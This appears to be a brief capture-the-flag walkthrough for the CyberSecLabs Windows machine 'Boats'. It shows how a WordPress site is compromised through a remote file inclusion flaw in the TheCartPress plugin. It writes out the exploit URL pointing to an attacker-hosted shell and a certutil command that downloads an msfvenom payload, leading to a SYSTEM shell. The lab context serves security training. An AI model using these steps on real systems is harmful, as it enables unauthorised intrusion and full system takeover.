Boats is a windows box hosted by CyberSecLabs. Let’s dive into it and start with an NMap scan.

Checking HTTP we notice the website uses WordPress. Let’s kick off CMSMap to check the website and see if anything interesting is discovered.

As it can be seen below the plugin thecartpress might be vulnerable to RFI.

To test the vuln i used Namam Sahore RFI shell. You can get it from here. Download the file and use python to create a web server.

The vulnerable parameter is: http://boats.csl/wp-content/plugins/thecartpress/checkout/CheckoutEditor.php?tcp_save_fields=true&tcp_class_name=asdf&tcp_class_path=http://<YOUR_IP>/rfi_shell

The file inclusion is accomplished, therefore we can now send commands to the underlying operating system.

Generate a shell using msfvenom and download using certutil. You can use the following syntax to download it: certutil -cacheurl -f http://<YOUR_IP>/shell.exe shell.exe.

Create a msf listener and run it.

Get back to your RFI shell and type and execute the exe payload.

The session is spawned as NT AUTHORITY\SYSTEM because the service (xampp) was running under this user.

You should now be able to grab both user&admin flag.